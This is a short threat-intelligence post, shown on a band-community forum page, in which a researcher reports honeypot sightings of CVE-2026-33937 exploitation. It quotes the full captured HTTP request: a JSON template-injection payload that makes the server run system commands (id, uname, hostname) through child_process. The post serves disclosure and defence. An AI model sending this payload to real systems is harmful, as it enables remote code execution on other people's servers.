Skip to content
Brand Logo

The digital town square for the concert band community.

Connect with local ensembles, trade repertoire insights, and keep the pulse of the wind band world.

  • Niels HeinenH

    Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937

    World dfir honeypot infosec cybersecurity
    1
    0 Votes
    1 Posts
    0 Views
    Niels HeinenH
    Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937 Here is a full request:POST /api/email/preview HTTP/1.1Host: x.x.x.x:8080Connection: closeContent-Length: 585Content-Type: application/jsonUser-Agent: Go-http-client/1.1{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}#dfir #honeypot #infosec #cybersecurity